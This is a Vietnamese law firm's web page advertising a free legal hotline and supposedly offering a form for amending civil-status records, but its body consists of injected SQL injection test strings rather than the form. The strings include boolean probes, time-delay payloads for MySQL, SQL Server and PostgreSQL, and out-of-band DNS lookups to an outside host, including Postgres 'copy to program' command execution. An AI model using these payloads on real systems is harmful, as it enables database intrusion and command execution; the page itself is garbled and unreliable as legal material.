Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai điều chỉnh nội dung trong các giấy tờ hộ tịch khác (không dùng cho giấy khai sinh)

Cập nhật lần cuối lúc 16:43 ngày 12/07/2013

Nguồn: Công ty Luật Vinabiz/ Nguoiduatin.vn
1
1
1
1
-1 OR 2+249-249-1=0+0+0+1 --
-1 OR 3+249-249-1=0+0+0+1 --
-1 OR 3*2<(0+5+249-249) --
-1 OR 3*2>(0+5+249-249) --
-1 OR 2+823-823-1=0+0+0+1
-1 OR 3+823-823-1=0+0+0+1
1'"
-1 OR 3*2<(0+5+823-823)
-1 OR 3*2>(0+5+823-823)
\
-1' OR 2+660-660-1=0+0+0+1 --
1
-1' OR 3+660-660-1=0+0+0+1 --
@@LB9G2
-1' OR 3*2<(0+5+660-660) --
-1' OR 3*2>(0+5+660-660) --
JyI=
-1' OR 2+852-852-1=0+0+0+1 or 'M3XjV5u2'='
-1' OR 3+852-852-1=0+0+0+1 or 'M3XjV5u2'='
-1' OR 3*2<(0+5+852-852) or 'M3XjV5u2'='
-1' OR 3*2>(0+5+852-852) or 'M3XjV5u2'='
-1" OR 2+782-782-1=0+0+0+1 --
-1" OR 3+782-782-1=0+0+0+1 --
-1" OR 3*2<(0+5+782-782) --
-1" OR 3*2>(0+5+782-782) --
if(now()=sysdate(),sleep(8.280000000000001),0)/*'XOR(if(now()=sysdate(),sleep(8.280000000000001),0))OR'"XOR(if(now()=sysdate(),sleep(8.280000000000001),0))OR"*/
(select(0)from(select(sleep(12.420000000000001)))v)/*'+(select(0)from(select(sleep(12.420000000000001)))v)+'"+(select(0)from(select(sleep(12.420000000000001)))v)+"*/
-1; waitfor delay '0:0:12.420000000000001' --
-1); waitfor delay '0:0:12.420000000000001' --
1 waitfor delay '0:0:4.140000000000001' --
01MF3TRG'; waitfor delay '0:0:4.140000000000001' --
R64rqQEj'; waitfor delay '0:0:12.420000000000001' --
-1;select pg_sleep(8.280000000000001); --
-1);select pg_sleep(8.280000000000001); --
-1));select pg_sleep(12.420000000000001); --
I1JqsCVq';select pg_sleep(12.420000000000001); --
pkhTSWdT');select pg_sleep(12.420000000000001); --
wv1fjAeC'));select pg_sleep(4.140000000000001); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6103.34060.36bfd.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6104.34060.36bfd.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6105.34060.36bfd.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6106.34060.36bfd.\1.bxss.me
311'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: